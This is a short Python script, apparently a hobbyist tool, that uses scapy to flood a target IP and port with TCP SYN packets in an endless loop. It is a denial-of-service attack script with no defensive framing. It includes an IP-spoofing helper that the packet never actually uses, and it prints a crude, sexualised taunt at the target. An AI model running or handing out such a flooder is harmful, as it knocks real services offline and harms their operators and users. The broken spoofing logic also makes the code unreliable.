from scapy.all import IP, TCP, send
import sys
import random


# cli args
if len(sys.argv) != 3:
    print(f"Usage: python {sys.argv[0]} <target_ip> <target_port>")


target_ip = sys.argv[1]
target_port = int(sys.argv[2])

# Generate random IP addy, generated by AI cause im too lazy to manually
# avoid reserved ips
def generate_random_ip():
    # Loop until a non-reserved IP is generated
    while True:
        oct1 = random.randint(1, 254)
        oct2 = random.randint(0, 255)
        oct3 = random.randint(0, 255)
        oct4 = random.randint(1, 254)
        
        # Avoid Class A Private (10.x.x.x), Loopback (127.x.x.x), 
        # Multicast (224-239), and Experimental (240-255)
        if oct1 == 10 or oct1 == 127 or oct1 >= 224:
            continue
            
        # Avoid Class B Private (172.16.x.x to 172.31.x.x)
        if oct1 == 172 and 16 <= oct2 <= 31:
            continue
            
        # Avoid Class C Private (192.168.x.x)
        if oct1 == 192 and oct2 == 168:
            continue
            
        # If all checks pass, it is a public-facing IP
        return f"{oct1}.{oct2}.{oct3}.{oct4}"

# funny ahh message
print(f"{target_ip}:{target_port} just got molested by D-D-D-D-D-DJ Fowlerrrrrr")

# Send it
while True:
    # Gen IP, build packet and send
    spoofed_ip = generate_random_ip()
    
    packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")

    send(packet, verbose=False)